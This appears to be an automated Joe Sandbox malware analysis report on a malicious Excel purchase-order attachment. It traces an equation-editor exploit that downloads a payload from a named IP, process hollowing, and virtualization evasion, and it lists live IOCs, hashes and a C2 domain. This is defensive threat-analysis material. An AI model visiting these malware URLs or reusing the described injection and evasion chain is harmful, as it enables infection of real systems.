          Domain Accounts | 1 Shared Modules | Logon Script (Windows) | Logon Script (Windows) | 1 Access Token Manipulation | Security Account Manager | 2 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 1 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | 22 Exploitation for Client Execution | Logon Script (Mac) | Logon Script (Mac) | 512 Process Injection | NTDS | 2 Process Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 121 Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud |
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 Scripting | Cached Domain Credentials | 2 File and Directory Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
          External Remote Services | Scheduled Task | Startup Items | Startup Items | 3 Obfuscated Files or Information | DCSync | 116 System Information Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 1 Software Packing | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |
          Behavior Graph

          Behavior Graph ID: 626175 | Sample: BON DE COMMANDE POUR CHENOU... | Startdate: 13/05/2022 | Architecture: WINDOWS | Score: 100
          Start: Multi AV Scanner detection for domain / URL; Found malware configuration; Malicious sample detected (through community Yara rule); 11 other signatures
            EXCEL.EXE (started) - dropped: ~$BON DE COMMANDE POUR CHENOUFI AEK.xlsx, data
            EQNEDT32.EXE (started) - network: 103.156.91.153, 49171, 80 TWIDC-AS-APTWIDCLimitedHK unknown - dropped: C:\Users\user\AppData\Local\...\vbc[1].exe, PE32; C:\Users\Public\vbc.exe, PE32 - signatures: Office equation editor establishes network connection; Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
              vbc.exe (started) - dropped: C:\Users\user\AppData\Local\Temp\bmexo.exe, PE32 - signatures: Machine Learning detection for dropped file
                bmexo.exe (started) - signatures: Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors); Tries to detect virtualization through RDTSC time measurements; Injects a PE file into a foreign processes
                  bmexo.exe (started) - signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
                    explorer.exe (injected)
                      chkdsk.exe (started) - signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                        cmd.exe (started)

Source | Detection | Scanner | Label | Link
BON DE COMMANDE POUR CHENOUFI AEK.xlsx | 38% | Virustotal | | Browse
BON DE COMMANDE POUR CHENOUFI AEK.xlsx | 27% | ReversingLabs | Document-OLE.Exploit.CVE-2018-0802 |

Source | Detection | Scanner | Label | Link
C:\Users\Public\vbc.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link | Download
6.0.bmexo.exe.400000.7.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
6.2.bmexo.exe.400000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
5.2.bmexo.exe.170000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
6.0.bmexo.exe.400000.5.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
6.0.bmexo.exe.400000.9.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File

No Antivirus matches

Source | Detection | Scanner | Label | Link
http://wellformedweb.org/CommentAPI/ | 0% | URL Reputation | safe |
http://www.iis.fhg.de/audioPA | 0% | URL Reputation | safe |
http://103.156.91.153/fdcloudfiles/vbc.exej | 0% | Avira URL Cloud | safe |
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe |
http://treyresearch.net | 0% | URL Reputation | safe |
http://103.156.91.153/fdcloudfiles/vbc.exes | 0% | Avira URL Cloud | safe |
http://103.156.91.153/fdcloudfiles/vbc.exe | 11% | Virustotal | | Browse
http://103.156.91.153/fdcloudfiles/vbc.exe | 100% | Avira URL Cloud | malware |
http://java.sun.com | 0% | URL Reputation | safe |
http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe |
www.freerenoadvice.com/ud5f/ | 100% | Avira URL Cloud | malware |
http://computername/printers/printername/.printer | 0% | Avira URL Cloud | safe |
http://www.%s.comPA | 0% | URL Reputation | safe |
http://103.156.91.153/fdcloudfiles/vbc.exehhC: | 0% | Avira URL Cloud | safe |
http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe |
          No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://103.156.91.153/fdcloudfiles/vbc.exe | true | 11%, Virustotal, Browse; Avira URL Cloud: malware | unknown
www.freerenoadvice.com/ud5f/ | true | Avira URL Cloud: malware | low
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.windows.com/pctv. | explorer.exe, 00000007.00000000.1012455681.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | false | | high
http://investor.msn.com | explorer.exe, 00000007.00000000.1012455681.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | false | | high
http://www.msnbc.com/news/ticker.txt | explorer.exe, 00000007.00000000.1012455681.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | false | | high
http://wellformedweb.org/CommentAPI/ | explorer.exe, 00000007.00000000.1015141560.00000000046D0000.00000002.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.iis.fhg.de/audioPA | explorer.exe, 00000007.00000000.1015141560.00000000046D0000.00000002.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.piriform.com/ccleanerq | explorer.exe, 00000007.00000000.999156746.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1036163361.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1011925093.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.987988330.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.piriform.com/ccleaner1SPS0 | explorer.exe, 00000007.00000000.994238368.0000000008611000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1019525973.0000000008611000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1006887265.0000000008611000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://103.156.91.153/fdcloudfiles/vbc.exej | EQNEDT32.EXE, 00000002.00000002.965939065.00000000035D0000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://nsis.sf.net/NSIS_ErrorError | vbc.exe, 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmp, vbc.exe, 00000004.00000000.964387400.000000000040A000.00000008.00000001.01000000.00000004.sdmp, vbc.exe.2.dr, vbc[1].exe.2.dr | false | | high
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | explorer.exe, 00000007.00000000.1038912442.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.hotmail.com/oe | explorer.exe, 00000007.00000000.1012455681.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | false | | high
http://treyresearch.net | explorer.exe, 00000007.00000000.1015141560.00000000046D0000.00000002.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
http://103.156.91.153/fdcloudfiles/vbc.exes | EQNEDT32.EXE, 00000002.00000002.965721686.000000000062E000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | explorer.exe, 00000007.00000000.1038912442.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp | false | | high
http://java.sun.com | explorer.exe, 00000007.00000000.983528544.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1034341934.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.996739649.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1009149384.0000000000335000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.icra.org/vocabulary/. | explorer.exe, 00000007.00000000.1038912442.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | explorer.exe, 00000007.00000000.1034899702.0000000001DD0000.00000002.00000001.00040000.00000000.sdmp | false | | high
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | explorer.exe, 00000007.00000000.1007066480.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.993998682.0000000008575000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1019426082.0000000008575000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.994421316.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1019795394.0000000008807000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1006658399.0000000008575000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://investor.msn.com/ | explorer.exe, 00000007.00000000.1012455681.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | false | | high
http://www.piriform.com/ccleaner | explorer.exe, 00000007.00000000.993794779.00000000084C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1019795394.0000000008807000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1006658399.0000000008575000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://computername/printers/printername/.printer | explorer.exe, 00000007.00000000.1015141560.00000000046D0000.00000002.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | low
http://www.%s.comPA | explorer.exe, 00000007.00000000.1034899702.0000000001DD0000.00000002.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | low
http://www.autoitscript.com/autoit3 | explorer.exe, 00000007.00000000.983528544.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1034341934.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.996739649.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1009149384.0000000000335000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://support.mozilla.org | explorer.exe, 00000007.00000000.983528544.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1034341934.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.996739649.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1009149384.0000000000335000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.piriform.com/ccleanerv | explorer.exe, 00000007.00000000.1001945671.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.989754024.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1014187603.0000000004385000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://103.156.91.153/fdcloudfiles/vbc.exehhC: | EQNEDT32.EXE, 00000002.00000002.965721686.000000000062E000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://servername/isapibackend.dll | explorer.exe, 00000007.00000000.1003526577.0000000006450000.00000002.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | low
                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
103.156.91.153 | unknown | unknown | | 134687 | TWIDC-AS-APTWIDCLimitedHK | true
                                        Joe Sandbox Version:34.0.0 Boulder Opal
                                        Analysis ID:626175
Start date and time:13/05/2022 17:06:21 (2022-05-13 17:06:21 +02:00)
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 10m 4s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Sample file name:BON DE COMMANDE POUR CHENOUFI AEK.xlsx
                                        Cookbook file name:defaultwindowsofficecookbook.jbs
                                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed:13
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:1
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal100.troj.expl.evad.winXLSX@11/16@0/1
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HDC Information:
                                        • Successful, ratio: 35.9% (good quality ratio 34.6%)
                                        • Quality average: 75%
                                        • Quality standard deviation: 28.2%
                                        HCA Information:
                                        • Successful, ratio: 100%
                                        • Number of executed functions: 110
                                        • Number of non-executed functions: 73
                                        Cookbook Comments:
                                        • Found application associated with file extension: .xlsx
                                        • Adjust boot time
                                        • Enable AMSI
                                        • Found Word or Excel or PowerPoint or XPS Viewer
                                        • Attach to Office via COM
                                        • Scroll down
                                        • Close Viewer
                                        • Exclude process from analysis (whitelisted): dllhost.exe, audiodg.exe, WerFault.exe, conhost.exe, svchost.exe
                                        • Excluded IPs from analysis (whitelisted): 104.208.16.94, 52.182.143.212
                                        • Excluded domains from analysis (whitelisted): onedsblobprdcus15.centralus.cloudapp.azure.com, watson.microsoft.com, legacywatson.trafficmanager.net, onedsblobprdcus16.centralus.cloudapp.azure.com
• Not all processes were analyzed, report is missing behavior information
                                        • Report size getting too big, too many NtCreateFile calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
17:07:42 | API Interceptor | 89x Sleep call for process: EQNEDT32.EXE modified
17:07:55 | API Interceptor | 61x Sleep call for process: bmexo.exe modified
17:08:28 | API Interceptor | 220x Sleep call for process: chkdsk.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
103.156.91.153 | MRC DIRECT ORDER LEBANON.xlsx | Get hash | malicious | Browse | 103.156.91.153/cloudfile/vbc.exe
103.156.91.153 | Energe 1,010.00.xlsx | Get hash | malicious | Browse | 103.156.91.153/__cloud_for_file/vbc.exe
103.156.91.153 | 5P22020005-MEDUK1317768_CBL02.xlsx | Get hash | malicious | Browse | 103.156.91.153/365space/vbc.exe
103.156.91.153 | BON DE COMMANDE--BCA2200710.xlsx | Get hash | malicious | Browse | 103.156.91.153/msdrive10/vbc.exe

No context

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
TWIDC-AS-APTWIDCLimitedHK | MRC DIRECT ORDER LEBANON.xlsx | Get hash | malicious | Browse | 103.156.91.153
TWIDC-AS-APTWIDCLimitedHK | Energe 1,010.00.xlsx | Get hash | malicious | Browse | 103.156.91.153
TWIDC-AS-APTWIDCLimitedHK | 5P22020005-MEDUK1317768_CBL02.xlsx | Get hash | malicious | Browse | 103.156.91.153
TWIDC-AS-APTWIDCLimitedHK | 9knJQfYMP8 | Get hash | malicious | Browse | 103.154.221.88
TWIDC-AS-APTWIDCLimitedHK | BON DE COMMANDE--BCA2200710.xlsx | Get hash | malicious | Browse | 103.156.91.153
TWIDC-AS-APTWIDCLimitedHK | fjqwmhHmzv | Get hash | malicious | Browse | 103.153.254.67
TWIDC-AS-APTWIDCLimitedHK | https://cwerujnfocvhi3w4-hgfv9io3wrehnv-gp093rhgv3r4v.obs.af-south-1.myhuaweicloud.com/vnoiruhgv0-p39ehrgvb-0p9he3r-0bvpg9he4t-09bg.html?AWSAccessKeyId=BIYYVE07OMDKEILTTF0R&Expires=1653564383&Signature=4e6EXLQcv1xcMfrEkMEdfz05gIw%3D# | Get hash | malicious | Browse | 103.153.183.146
TWIDC-AS-APTWIDCLimitedHK | https://cwerujnfocvhi3w4-hgfv9io3wrehnv-gp093rhgv3r4v.obs.af-south-1.myhuaweicloud.com/vnoiruhgv0-p39ehrgvb-0p9he3r-0bvpg9he4t-09bg.html?AWSAccessKeyId=BIYYVE07OMDKEILTTF0R&Expires=1653564383&Signature=4e6EXLQcv1xcMfrEkMEdfz05gIw%3D#louis@weighpack.com | Get hash | malicious | Browse | 103.153.183.146
TWIDC-AS-APTWIDCLimitedHK | NEW QUOTATION.doc | Get hash | malicious | Browse | 103.153.76.136
TWIDC-AS-APTWIDCLimitedHK | VJAGa1CbxA | Get hash | malicious | Browse | 103.157.99.19
TWIDC-AS-APTWIDCLimitedHK | sora.arm7 | Get hash | malicious | Browse | 103.157.51.70
TWIDC-AS-APTWIDCLimitedHK | JWvorA813E | Get hash | malicious | Browse | 103.153.150.146
TWIDC-AS-APTWIDCLimitedHK | NANSHA -CHINA 2.doc | Get hash | malicious | Browse | 103.153.76.136
TWIDC-AS-APTWIDCLimitedHK | order_april_30042022_000000000000000000.xlsx | Get hash | malicious | Browse | 103.156.91.63
TWIDC-AS-APTWIDCLimitedHK | cxgIVwyGAO | Get hash | malicious | Browse | 103.153.150.167
TWIDC-AS-APTWIDCLimitedHK | sora.arm7 | Get hash | malicious | Browse | 103.157.99.61
TWIDC-AS-APTWIDCLimitedHK | 1isequal9.x86 | Get hash | malicious | Browse | 154.211.10.101
TWIDC-AS-APTWIDCLimitedHK | Ghatge Patil Industries Ltd.xlsx | Get hash | malicious | Browse | 103.156.90.79
TWIDC-AS-APTWIDCLimitedHK | #Uc820#Ud22c#Uc6e8#Uc774#Ube0c #Ubc1c#Uc8fc#Uc11c_2022#Uc77c#Uc2e0#Ud14c#Ud06c.xlsx | Get hash | malicious | Browse | 103.156.91.63
TWIDC-AS-APTWIDCLimitedHK | PO_SBL#0026.xlsx | Get hash | malicious | Browse | 103.156.90.79
                                        No context
                                        No context
                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                        Category:downloaded
                                        Size (bytes):263783
                                        Entropy (8bit):7.9127214183326275
                                        Encrypted:false
                                        SSDEEP:3072:LODZGPEounb6dFqeTHg1WG3Tpf8o7j8kRSLCXD35Zq66TvNJsd19vQ1/A3wCEGj7:LOtIO6RsBTpfD7lRVq6uJM194uLiC87i
                                        MD5:5AF1C7DD89A535DEE51C3E28B4A74F8D
                                        SHA1:A4BEACE30EF4B975E247AFBAF837E757A5372F7E
                                        SHA-256:039EF59E7502A98D0B9A6A7E7818444F6DBD699A4CDB10A8DBA031222CFDDE6F
                                        SHA-512:28C4CAC036B93D8943D42613DC8C703A66D291393760524C22E0FCD76E7B67CE73E40704C29321E42765364638F0EE3C11AF52922700570BA47AB661B846A7F7
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        Reputation:low
                                        IE Cache URL:http://103.156.91.153/fdcloudfiles/vbc.exe
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L.....Oa.................h....:.....F6............@...........................;...........@...........................................;.P............................................................................................................text....g.......h.................. ..`.rdata...............l..............@..@.data.....9.........................@....ndata........:..........................rsrc...P.....;.....................@..@................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:ms-windows metafont .wmf
                                        Category:dropped
                                        Size (bytes):1970
                                        Entropy (8bit):5.125773446782967
                                        Encrypted:false
                                        SSDEEP:48:KxK48S3oEL48I+KL48uL48kL48tnL48I0L48Ih2L48Ls4fnPK6L48tOL48bCb3RM:KxKS3okSuEtN1O2FfUcM
                                        MD5:30935B0D56A69E2E57355F8033ADF98B
                                        SHA1:5F7C13E36023A1B3B3DAF030291C02631347C2AB
                                        SHA-256:077232D301E2DF2E2702BD9E7323806AC20134F989C8A4102403ECBF5E91485E
                                        SHA-512:5D633D1EC5559443D3DA5FAD2C0CFC5DBF6A006EF6FBEE8C47595A916A899FBDF713897289E99EE62C07B52CCB61578253791AC57712DF040469F21287A742E9
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        Preview:.....F.>...u........R........................u.F.............................-...................".....-...........................".....-....................-...........F...$.!.....!...*...2...9...?...C...F...G...F...C...?...9...2...*...!.........................................................................................-...............-.......-....................-...............$...[...6._...x.[.......-...............-.......-....................-...............$...o.D...x.#.w...G.o.D.....-...............-.......-....................-...............$.........!.V.{...y.............-...............-.......-....................-...............$.....M.w...n.@.[.....M.....-...............-.......-....................-...............$.......f...Q...........-...............-.......-....................-...............$...'.U.....K...'.U.....-...............-.......-....................-...............$.c...u...\...D...,.........j...S...=...%.........x...c...N...:...&.v...p...
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:ms-windows metafont .wmf
                                        Category:dropped
                                        Size (bytes):4630
                                        Entropy (8bit):5.070400845866794
                                        Encrypted:false
                                        SSDEEP:96:RmljFSTwLmSaj2W67xYK2dlEtF622okgmCCHtkTl9ggBgThsMihEylB8By98Rj:UlRSkCSajh6tL2dlEtFV2VgmVNkTl9gJ
                                        MD5:1A4FF280B6D51A6ED16C3720AF1CD6EE
                                        SHA1:277878BEF42DAC8BB79E15D3229D7EEC37CE22D9
                                        SHA-256:E5D86DD19EE52EBE2DA67837BA4C64454E26B7593FAC8003976D74FF848956E7
                                        SHA-512:3D41BAF77B0BEEF85C112FCBD3BE30E940AF1E586C4F9925DBDD67544C5834ED794D0042A6F6FF272B21D1106D798CBB05FA2848A788A3DAFE9CFBC8574FCECA
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        Preview:...................[R..................................D.^...................-...................".....-...........................".....-.....................-...............$...........o.............................-...............-.......-.....................-...............$.......W.....i...T.........-...............-.......-.....................-...........>...$.....~.........................z...m.....H.v.....?.........................|...r...f...Z...L...>...0... .............~.....-...............-.......-.....................-...........6...$.....................................-...?...U...n...........!...!.........................................-...............-.......-.....................-...........8...$.......................s...e.g.\.L.Y./.[..._...g...p...~.............'.../...L.v.g.i...V...@...'...............-...............-.......-.....................-........... ...$.......................r...{...................................-...............-.......-...........
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:ms-windows metafont .wmf
                                        Category:dropped
                                        Size (bytes):4630
                                        Entropy (8bit):5.070400845866794
                                        Encrypted:false
                                        SSDEEP:96:RmljFSTwLmSaj2W67xYK2dlEtF622okgmCCHtkTl9ggBgThsMihEylB8By98Rj:UlRSkCSajh6tL2dlEtFV2VgmVNkTl9gJ
                                        MD5:1A4FF280B6D51A6ED16C3720AF1CD6EE
                                        SHA1:277878BEF42DAC8BB79E15D3229D7EEC37CE22D9
                                        SHA-256:E5D86DD19EE52EBE2DA67837BA4C64454E26B7593FAC8003976D74FF848956E7
                                        SHA-512:3D41BAF77B0BEEF85C112FCBD3BE30E940AF1E586C4F9925DBDD67544C5834ED794D0042A6F6FF272B21D1106D798CBB05FA2848A788A3DAFE9CFBC8574FCECA
                                        Malicious:false
                                        Preview:...................[R..................................D.^...................-...................".....-...........................".....-.....................-...............$...........o.............................-...............-.......-.....................-...............$.......W.....i...T.........-...............-.......-.....................-...........>...$.....~.........................z...m.....H.v.....?.........................|...r...f...Z...L...>...0... .............~.....-...............-.......-.....................-...........6...$.....................................-...?...U...n...........!...!.........................................-...............-.......-.....................-...........8...$.......................s...e.g.\.L.Y./.[..._...g...p...~.............'.../...L.v.g.i...V...@...'...............-...............-.......-.....................-........... ...$.......................r...{...................................-...............-.......-...........
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                        Category:dropped
                                        Size (bytes):223752
                                        Entropy (8bit):3.2805343869701504
                                        Encrypted:false
                                        SSDEEP:1536:gAGsM8yOYZWQ99d99H9999999lN6Hz8iiiiiiiiiiiiiiiPnHnbq+QVwtaKfdL4a:gMMVNSztnZft6rMMVNSztnZft6u
                                        MD5:8E3A74F7AA420B02D34C69E625969C0A
                                        SHA1:4743F57F0F702C5B47FA1668D9173E08ADA16448
                                        SHA-256:0CD83C55739629F98FE6AFD3E25A5BCBB346CBEF58BC592C1260E9F0FA8575A9
                                        SHA-512:ADE6B91E260AFA08CC286471D0AD7BCA82FF5E1FE506D48B37A13E3CDD2717171CDAC38C77CFF18FD4C26CA9470B002B63B7FDDC0466FC6F7010A772BF557054
                                        Malicious:false
                                        Preview:....l................................... EMF.....j..........................8...X....................?......F...........GDIC...............p.........8.........................F...........................A. ...........F.......(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:ms-windows metafont .wmf
                                        Category:dropped
                                        Size (bytes):1970
                                        Entropy (8bit):5.125773446782967
                                        Encrypted:false
                                        SSDEEP:48:KxK48S3oEL48I+KL48uL48kL48tnL48I0L48Ih2L48Ls4fnPK6L48tOL48bCb3RM:KxKS3okSuEtN1O2FfUcM
                                        MD5:30935B0D56A69E2E57355F8033ADF98B
                                        SHA1:5F7C13E36023A1B3B3DAF030291C02631347C2AB
                                        SHA-256:077232D301E2DF2E2702BD9E7323806AC20134F989C8A4102403ECBF5E91485E
                                        SHA-512:5D633D1EC5559443D3DA5FAD2C0CFC5DBF6A006EF6FBEE8C47595A916A899FBDF713897289E99EE62C07B52CCB61578253791AC57712DF040469F21287A742E9
                                        Malicious:false
                                        Preview:.....F.>...u........R........................u.F.............................-...................".....-...........................".....-....................-...........F...$.!.....!...*...2...9...?...C...F...G...F...C...?...9...2...*...!.........................................................................................-...............-.......-....................-...............$...[...6._...x.[.......-...............-.......-....................-...............$...o.D...x.#.w...G.o.D.....-...............-.......-....................-...............$.........!.V.{...y.............-...............-.......-....................-...............$.....M.w...n.@.[.....M.....-...............-.......-....................-...............$.......f...Q...........-...............-.......-....................-...............$...'.U.....K...'.U.....-...............-.......-....................-...............$.c...u...\...D...,.........j...S...=...%.........x...c...N...:...&.v...p...
                                        Process:C:\Users\Public\vbc.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):80384
                                        Entropy (8bit):6.294104149845472
                                        Encrypted:false
                                        SSDEEP:1536:k6TaC+v1wwfr0oxAomP3cX/4pi2sWjcd8dI:la5CwD1/ui58W
                                        MD5:FD42CBBC6D53AD34694C46731AABD852
                                        SHA1:BE1B3AF37A4E54040EDFBA4A728D5316181ACE7D
                                        SHA-256:2092286C74AA5DF753BE3FBDC6D3194104E89FC1C4A8E1BECEF8AE825FE4D052
                                        SHA-512:AEE5FA5F2D81965112518A3FFFB28ADD9F7A52545A686042D1EF8CA81F970ACF7B88BC7AF1FA3E789F07918A5A7DBF152A3A71E97D23CD2FD6EC21BBD609E799
                                        Malicious:true
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........w...w...w...%`..w...%^..w...%a.w......w...w..w..p....w..p.~..w..p....w..Rich.w..................PE..L...8.~b............................7.............@.......................................@..................................$.......p..................................T...............................@............................................text...U........................... ..`.rdata...N.......P..................@..@.data... 1...0......................@....rsrc........p.......*..............@..@.reloc...............,..............@..B................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Users\Public\vbc.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):4810
                                        Entropy (8bit):6.182005918340119
                                        Encrypted:false
                                        SSDEEP:96:rvS/az70J2n6QKA9e3vYlKb23QPMW5Ba/3jy:Ttv0J1QKA4pb23bW5Ba/3W
                                        MD5:086741FA34CD34B27FB9B5EBA9783209
                                        SHA1:456B182F04DE595E5971C702BDEA0F2E6F5E81E1
                                        SHA-256:2EA0C458D3E8B5A1C217A3A5EB4B5115653C92AEFC8D920E111862413ACBCAF0
                                        SHA-512:66E6B4BF7FA709384847A848EFE0CA2DF8F3A2B953F27AD320F00D7A0912EB6A07BFC58D157CE765271AACC872E03043AC7564C4916BE61ECBA6B44FE8FBD8A4
                                        Malicious:false
